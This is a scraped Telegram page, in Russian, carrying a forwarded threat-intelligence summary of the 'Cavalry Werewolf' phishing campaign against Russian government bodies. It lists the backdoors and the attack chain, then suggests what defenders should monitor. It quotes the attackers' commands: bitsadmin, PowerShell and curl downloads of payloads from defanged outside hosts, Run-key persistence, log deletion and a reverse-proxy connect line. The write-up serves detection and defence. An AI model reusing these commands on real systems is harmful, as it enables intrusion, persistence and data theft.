https://github.com/advisories/GHSA-6rf6-f9qg-8v94
🔥3👍2
Интересный разбор про Комрад Сайгу 🦌
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
Cavalry Werewolf: целевая атака на госсектор РФ
⚙️ Формат атаки
🎯 Фишинг → архив с паролем («Служебная записка», «План работы почтового сервера») → исполняемый файл с бэкдором BackDoor.ShellNET.1 (на основе Reverse-Shell-CS).
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.
🧠 Цели и действия атакующего
Атакующие проводят ручную разведку через cmd.exe:
Загружают новые модули через PowerShell и curl:
🧩 Инструменты Cavalry Werewolf
BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang),
Trojan.Inject5.57968 — инжект в
Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в
⛓️💥Типовая цепочка действий
1️⃣ Фишинг → BackDoor.ShellNET (обратный шелл).
2️⃣ Разведка: whoami / ipconfig / net user.
3️⃣ Загрузка новых модулей через bitsadmin, PowerShell или curl.
4️⃣ Закрепление через Run-ключ или планировщик.
5️⃣ Инжект в .NET-процесс, маскировка под легитимный aspnet_compiler.exe.
6️⃣ Создание туннелей и Telegram-C2.
7️⃣ Эксфильтрация документов, удаление следов.
🧠 Тактические наблюдения
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка:
Хранение и запуск из
Переход от разведки к туннелям и долговременному C2 в одном цикле.
🔍 Что отслеживать
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на
• Трафик к api.telegram.org или подозрительным IP
🔗 https://news.drweb.ru/show/?i=15078
🦔 THF
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
bitsadmin /transfer www /download hxxp://ip/winpot.exe C:\Users\Public\Downloads\winpot.exe
Первым ставится Trojan.FileSpyNET.5 – стилер документов, картинок и txt-файлов → IP/fileupper/getupper.php.Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.
Атакующие проводят ручную разведку через cmd.exe:
whoami
ipconfig /all
net user
dir C:\Users\<user>\Downloads
dir C:\Users\Public\Pictures
Проверяют сетевые прокси:[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com")Загружают новые модули через PowerShell и curl:
powershell -Command Invoke-WebRequest -Uri "hxxps://sss.qwadx.com/revv3.exe" -OutFile "C:\Users\Public\Pictures\rev.exe"
curl -o C:\Users\Public\Pictures\rev.exe hxxp://IP/code.exe
Закрепление через Run-ключ:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\Users\Public\Pictures\win.exe /f
Удаление следов: powershell -Command Remove-Item C:\Users\Public\Pictures\732.exe.BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang),
revv2.exe -connect IP:10443.Trojan.Inject5.57968 — инжект в
aspnet_compiler.exe, шифрование RC2 / AES, C2.Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в
%APPDATA%\systemservices\svc_host.exe, добавляет Run-ключ SystemServicesHost, сообщает в Telegram-бот о заменённых адресах.⛓️💥Типовая цепочка действий
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка:
bitsadmin → powershell → cmd.exe.Хранение и запуск из
C:\Users\Public\Pictures|Libraries|Downloads.Переход от разведки к туннелям и долговременному C2 в одном цикле.
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на
C:\Users\Public\.• Трафик к api.telegram.org или подозрительным IP
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3🔥3